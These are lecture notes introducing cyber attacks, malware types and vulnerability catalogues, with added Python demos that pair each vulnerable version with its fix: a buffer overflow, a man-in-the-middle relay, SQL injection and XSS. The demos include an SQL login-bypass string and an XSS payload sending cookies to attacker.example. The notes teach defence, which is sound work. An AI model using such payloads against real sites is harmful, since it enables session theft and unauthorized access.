Lecture 3
Cyber Attacks
A cyber-attack is a deliberate and malicious attempt to exploit vulnerabilities in computer systems,
networks, or software applications for various purposes, including unauthorized access, data theft,
disruption of services, or causing damage.
These attacks are typically carried out by individuals or groups with malicious intent, such as hackers,
cybercriminals, or state-sponsored actors.
Types of Cyber Attacks
Advanced Persistent Threat (APT):
An APT is a prolonged and targeted cyber-attack in which an attacker gains a foothold in a network and
remains undetected for an extended period. APTs are typically well resourced and proceed in stages:
initial compromise, establishing persistence, moving laterally through the network, and finally
exfiltrating data or achieving some other objective.
Backdoor:
A backdoor is a method used to bypass normal authentication and gain unauthorized access to an
operating system (OS) or application. It provides a secret entry point for attackers to enter a system
without being detected.
Buffer Overflow:
A buffer overflow occurs when a program writes more data into a fixed-size memory buffer than the buffer
can hold, so the excess spills into adjacent memory. By supplying oversized input, an attacker can corrupt
neighbouring variables, saved return addresses or function pointers, which can crash the program or
redirect execution to attacker-controlled code.
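The following added example (not part of the original lecture notes) reproduces the mechanism with Python's ctypes: a C-style struct with an 8-byte name buffer followed by a 32-bit "authenticated" flag, an unchecked copy like strcpy/memcpy that writes past the buffer, and the bounded copy that prevents it. The struct, field names and the 12-byte input are constructed for the demonstration; the overflow is deliberately confined to the struct so it cannot damage the interpreter's own memory.

```python
import ctypes
import sys


class LoginRecord(ctypes.Structure):
    # Same layout a C compiler produces for
    #   struct { char name[8]; int32_t authenticated; };
    # the 8-byte buffer is immediately followed by the flag.
    _fields_ = [("name", ctypes.c_char * 8),
                ("authenticated", ctypes.c_int32)]


def copy_name_unchecked(rec: LoginRecord, data: bytes) -> None:
    """Vulnerable: copies len(data) bytes with no bounds check, like strcpy or
    memcpy with an attacker-chosen length. Bytes past the 8th land on the flag."""
    ctypes.memmove(ctypes.addressof(rec) + LoginRecord.name.offset, data, len(data))


def copy_name_checked(rec: LoginRecord, data: bytes) -> bool:
    """Hardened: refuse any input that does not fit in the buffer."""
    if len(data) > LoginRecord.name.size:
        return False
    ctypes.memmove(ctypes.addressof(rec) + LoginRecord.name.offset, data, len(data))
    return True


def attacker_payload() -> bytes:
    # Constructed example input: fills the 8-byte name, then overwrites the
    # adjacent 32-bit flag with the value 1 in the machine's byte order.
    return b"A" * 8 + (1).to_bytes(4, sys.byteorder)


def run_demo() -> dict:
    payload = attacker_payload()
    # Keep the overflow inside the struct so only our own struct is corrupted.
    assert len(payload) <= ctypes.sizeof(LoginRecord)

    vulnerable = LoginRecord()          # authenticated starts at 0
    copy_name_unchecked(vulnerable, payload)

    hardened = LoginRecord()
    accepted = copy_name_checked(hardened, payload)

    return {
        "vulnerable_authenticated": vulnerable.authenticated,
        "hardened_accepted": accepted,
        "hardened_authenticated": hardened.authenticated,
    }


if __name__ == "__main__":
    print(run_demo())
```

In a real C program the same write would more often clobber a saved return address on the stack than a neighbouring flag; the defences are the same: bounded copies (strncpy with explicit NUL termination, snprintf, memcpy with a checked length), compiler stack protectors, and memory-safe languages where possible.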
Man-in-the-middle Attack:
In a man-in-the-middle attack, an attacker secretly positions themselves between two parties who believe
they are communicating directly with each other, intercepting and relaying their messages. This lets the
attacker eavesdrop on or alter the communication without either party noticing. Unencrypted or
unauthenticated channels are the usual targets.
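The exchange described above, as an added example that is not part of the original lecture notes: a client sends a payment order to a server through a relay controlled by the attacker. On the plain protocol the relay silently changes the payee; when the client appends an HMAC-SHA256 tag under a key the attacker does not have, the server detects the tampering and rejects the message. The key, the message and the party names are constructed for the demonstration.

```python
import hashlib
import hmac
import json

SHARED_KEY = b"example-key-agreed-out-of-band"  # constructed; unknown to the attacker


def client_send_plain(message: dict) -> bytes:
    """Plain protocol: no integrity protection at all."""
    return json.dumps(message).encode()


def client_send_authenticated(message: dict) -> bytes:
    """Message body followed by an HMAC-SHA256 tag over the body."""
    body = json.dumps(message).encode()
    tag = hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest().encode()
    return body + b"\n" + tag


def attacker_relay(wire: bytes) -> bytes:
    """The man in the middle: forwards every message but rewrites the payee.
    It cannot recompute the tag because it does not know SHARED_KEY."""
    body, _, tag = wire.partition(b"\n")
    msg = json.loads(body)
    if msg.get("to") == "alice":
        msg["to"] = "mallory"
    forged = json.dumps(msg).encode()
    return forged + (b"\n" + tag if tag else b"")


def server_receive_plain(wire: bytes) -> dict:
    return json.loads(wire)


def server_receive_authenticated(wire: bytes):
    """Returns the message if the tag verifies, otherwise None (rejected)."""
    body, _, tag = wire.partition(b"\n")
    expected = hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return json.loads(body)


def run_exchange() -> dict:
    order = {"to": "alice", "amount": 100}       # constructed example message
    plain = server_receive_plain(attacker_relay(client_send_plain(order)))
    authed = server_receive_authenticated(attacker_relay(client_send_authenticated(order)))
    return {
        "plain_delivered_to": plain["to"],        # attacker's rewrite went through
        "authenticated_accepted": authed is not None,  # tampering detected
    }


if __name__ == "__main__":
    print(run_exchange())
```

The HMAC gives integrity and authenticity, not confidentiality: the relay can still read the order. In practice both properties come from TLS with certificate verification, and the attack succeeds exactly when verification is skipped or the attacker can get a certificate the client trusts.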
Cross-Site Scripting (XSS):
XSS is an injection attack in which untrusted input containing script, usually JavaScript, is placed into a
web page without proper output encoding. When another user loads the page, their browser cannot tell
the injected script from the site's own code and runs it with that user's session, allowing the attacker to
steal cookies or other data or to perform actions on the user's behalf.
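An added example (not from the original notes) of the injection point and its fix: a comment-rendering function that interpolates user text straight into HTML, next to one that encodes it first. The payload and the attacker host name are constructed for the demonstration.

```python
import html

# Constructed example payload: a stored comment that tries to send the
# victim's cookies to an attacker-controlled host.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Untrusted text is dropped straight into the markup."""
    return f'<p class="comment">{comment}</p>'


def render_comment_escaped(comment: str) -> str:
    """html.escape turns <, >, &, " and ' into entities, so the browser
    displays the text instead of parsing it as a tag."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def contains_script_tag(page: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_escaped(PAYLOAD))
```

Encoding is context-specific: html.escape is correct for text nodes and quoted attribute values, but data placed inside a script block, an event handler, a URL or CSS needs the encoder for that context, and a Content-Security-Policy that forbids inline script limits the damage when an encoding is missed.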
Denial of Service (DoS) Attack:
A DoS attack aims to disrupt or temporarily disable the services of a system or network, making it
inaccessible to authorized users. This is achieved by overwhelming the target with a flood of traffic or
exploiting vulnerabilities to exhaust resources.
SQL Injection:
SQL injection is a common web application vulnerability that arises when untrusted input is concatenated
directly into a database query, so that attacker-supplied text is interpreted as SQL rather than as data.
This can result in authentication bypass, unauthorized access to or theft of data, or alteration of the
database.
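An added example (not from the original notes) using an in-memory SQLite database: a login check built by string concatenation, which a username of `alice' --` turns into a query whose password clause is commented out, beside the parameterized version that passes the same input as data. The table, rows and credentials are constructed for the demonstration; a real application would store password hashes, not plaintext.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database with two users (plaintext passwords for the demo only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "battery staple")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: user input becomes part of the SQL text."""
    query = ("SELECT 1 FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    # With username = "alice' --" the query becomes
    #   SELECT 1 FROM users WHERE username = 'alice' --' AND password = '...'
    # and everything after -- is a comment, so the password is never checked.
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: placeholders keep the input as data; quotes in it have no SQL meaning."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


INJECTED_USERNAME = "alice' --"   # constructed attacker input


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected:", login_vulnerable(db, INJECTED_USERNAME, "wrong"))
    print("parameterized, injected:", login_parameterized(db, INJECTED_USERNAME, "wrong"))
```

Parameterized queries (prepared statements) are the primary defence; input validation and least-privilege database accounts limit what an injection that slips through can do.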
Zero-day Exploit:
A zero-day exploit targets a vulnerability that is unknown to the vendor, or for which no patch has yet
been released, at the time attackers begin using it. Because no fix is available, defenders must rely on
generic mitigations and detection, so zero-day exploits can be highly effective until a security update is
released and applied.
Impacts of Cyber Attacks:
Financial Loss: Organizations may incur financial losses due to the costs of mitigating the attack, system
downtime, and potential theft of financial information.
Reputational Damage: Successful cyber-attacks can harm an organization's reputation, eroding customer
trust and confidence.
Legal Consequences: Depending on the nature of the attack and the data compromised, legal
consequences may arise, including regulatory fines and lawsuits.
Malicious Code
Virus:
Description: A virus is a type of malicious software that, when executed, has the ability to replicate itself
by modifying other computer programs and inserting its own code. Viruses often attach themselves to
executable files or documents, spreading when the infected file is shared or opened.
Network Worm:
Description: A network worm is standalone malware designed to replicate itself across computer
networks. Unlike viruses, worms don't need a host program to attach to and can independently spread
to other computers. They typically propagate by exploiting vulnerabilities in network-facing services or
by abusing weak or stolen credentials.
Trojan Horse:
Description: A Trojan Horse is a deceptive program that disguises itself as something legitimate or
beneficial, but once installed, it introduces malicious code onto the system. Unlike viruses or worms,
Trojans do not replicate independently but rely on user actions to spread.
Botnet:
Description: A botnet is a network of compromised computers, often controlled by a central server or
attacker. These compromised machines, known as bots, can be used for various malicious activities,
including distributed denial-of-service (DDoS) attacks, data theft, spam distribution, and providing the
attacker with unauthorized access to the compromised devices.
Keylogger:
Description: Keyloggers are surveillance tools that monitor and record every keystroke typed on a
specific computer's keyboard. Attackers use keyloggers to capture sensitive information such as
passwords, usernames, and other confidential data.
Rootkit:
Description: A rootkit is a collection of tools or programs designed to keep privileged ("root") access to a
computer or network while hiding that access. Rootkits conceal their files, processes and network
connections by manipulating the operating system, for example by hooking system calls or modifying
kernel data structures, so that administrators and security software do not see them.
Spyware:
Description: Spyware is software that operates covertly on a user's system, collecting information about
their internet activities, keystrokes, passwords, and other valuable data. The collected data is often sent
to third parties without the user's knowledge or consent.
Adware:
Description: Adware is designed to display advertisements on a user's computer. It may also redirect
search requests to advertising websites to collect marketing data about the user's preferences. While not
always inherently malicious, excessive adware can be intrusive and negatively impact user experience.
Ransomware:
Description: Ransomware is a type of malware that restricts users from accessing their system or files. It
either locks the system's screen or encrypts the user's files, demanding a ransom payment for their
release. Paying the ransom does not guarantee that the files will be restored, and it encourages further
criminal activity.
Vulnerabilities
A vulnerability in the context of cybersecurity refers to a weakness or flaw in a system's design,
implementation, configuration, or operation that can be exploited by attackers to compromise the
system's security. It is essentially a point of weakness in the system's defenses that, if discovered and
exploited, can lead to unauthorized access, data breaches, or other security incidents.
The concept of vulnerability involves three key elements:
A Flaw in the System:
This refers to a mistake or oversight in the design, development, or configuration of a system. It could be
a programming error, misconfiguration, or other weaknesses in the system's architecture that creates an
opening for potential exploitation.
Access of Attacker to that Flaw:
For a vulnerability to be exploited, an attacker needs to have access to the identified flaw. This access
could be gained through various means, such as network connections, physical access to a device, or
even social engineering techniques that trick users into inadvertently providing access.
Capability of Attacker to Exploit the Flaw:
Even if a flaw exists and the attacker has access to it, successful exploitation also depends on the
attacker's ability to craft and execute an exploit. This requires a certain level of technical knowledge and
skill to create and deploy the code or techniques necessary to take advantage of the vulnerability.
Classification of Vulnerabilities:
Vulnerabilities are weak points in different parts of a system. They can be classified by the asset they
affect:
Hardware:
Vulnerabilities in the physical components of computers and devices, such as firmware flaws, exposed
debug ports, or susceptibility to tampering.
Software:
Vulnerabilities in the operating systems, programs and applications running on computers, such as
coding errors, unsafe defaults, or missing input validation.
Network:
Weaknesses in the way computers connect and communicate with each other, such as unencrypted
protocols, open ports, or misconfigured firewalls.
Personal:
Weaknesses that involve people, such as users choosing weak passwords, making mistakes, or being
tricked by social engineering into doing something harmful.
Physical Site:
Vulnerabilities related to the physical location of computers, such as unlocked server rooms or
unrestricted access to a building where equipment is kept.
Organizational:
Weaknesses in how a company or group manages its computer systems and information, such as
missing policies, unclear responsibilities, or no process for applying security updates.
CVE (Common Vulnerabilities and Exposures):
Definition: CVE is a dictionary or catalog of publicly known vulnerabilities in software and hardware,
maintained by MITRE. Each vulnerability is assigned a unique identifier (CVE ID) of the form
CVE-YYYY-NNNNN, so that vendors, researchers and tools can refer to the same issue unambiguously.
CVSS (Common Vulnerability Scoring System):
Description: A scoring system used to quantify the severity of a vulnerability. It produces a numerical
base score from 0.0 to 10.0, derived from metrics such as attack vector, attack complexity, privileges
required, user interaction, and the impact on confidentiality, integrity and availability. The score helps
individuals and organizations prioritize which vulnerabilities to address first.
CWE (Common Weakness Enumeration):
Description: A catalog, also maintained by MITRE, of common mistakes and weakness types that can lead
to vulnerabilities in software and hardware, for example CWE-79 (cross-site scripting) and CWE-89 (SQL
injection). Where a CVE names one specific vulnerability in one product, a CWE names the underlying
class of error, and serves as a guidebook for understanding and preventing typical security problems.
OWASP TOP 10 VULNERABILITIES
OWASP, the Open Worldwide Application Security Project (formerly the Open Web Application Security
Project), is a nonprofit organization focused on improving software security. It provides free resources
and tools, the best known being the OWASP Top Ten, a periodically updated list of the most critical web
application security risks. OWASP encourages collaboration among security professionals and offers
projects such as OWASP ZAP for testing web applications for vulnerabilities and OWASP SAMM for
assessing and improving software security practices. Following OWASP guidance helps organizations
enhance the security of their web applications.